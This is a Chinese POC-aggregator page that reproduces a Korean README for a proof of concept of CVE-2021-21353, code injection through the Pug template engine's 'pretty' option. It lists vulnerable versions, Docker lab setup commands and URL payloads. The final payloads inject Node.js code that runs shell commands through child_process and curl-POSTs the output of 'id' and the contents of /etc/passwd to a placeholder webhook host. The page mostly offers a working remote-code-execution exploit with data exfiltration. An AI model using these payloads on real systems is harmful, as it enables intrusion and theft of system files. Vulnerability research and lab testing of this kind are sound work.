POC详情: 90fe387b16225f7d9fa8b12ff0b024a424daef16

来源
关联漏洞
标题: Pug 注入漏洞 (CVE-2021-21353)
描述:Tmont Pug是 (Tmont)开源的一个应用软件。提供了优化html的方式。 Pug 存在注入漏洞,攻击者可利用该漏洞编译器的“pretty”选项。
介绍
# PUG-RCE (CVE-2021-21353) POC


## 취약점 정보
CVE 번호 : cve-2021-21353  
CVSS 점수 : 8.1  
  
< 취약한 버전 >  
pug_version <= 3.0.0  
2.0.3 < pug-code-gen version,  3.0.0<= pug-code-gen version < 3.0.2

----

## 환경 설정
`git clone https://github.com/jinsu9758/PUG-RCE-CVE-2021-21353-POC.git`  
`cd PUG-RCE-CVE-2021-21353-POC`  
`sudo docker compose up`  

※ 3000번 포트로 접속 가능

----

## Payload
페이로드 테스트  
`?pretty=');console.log('executed');//`  
  
최종 페이로드  
`?pretty=');process.mainModule.constructor._load('child_process').exec('curl -X POST -d \"$(id)\" <webhook_site>');_=('`  
  
`?pretty=');process.mainModule.constructor._load('child_process').exec('curl -X POST -d \"$(cat /etc/passwd)\" <webhook_site>');_=('`
文件快照

[4.0K] /data/pocs/90fe387b16225f7d9fa8b12ff0b024a424daef16 ├── [4.0K] app │   ├── [ 303] index.js │   ├── [ 173] package.json │   └── [4.0K] views │   └── [ 119] template.pug ├── [ 137] docker-compose.yml ├── [ 99] Dockerfile └── [ 786] README.md 2 directories, 6 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。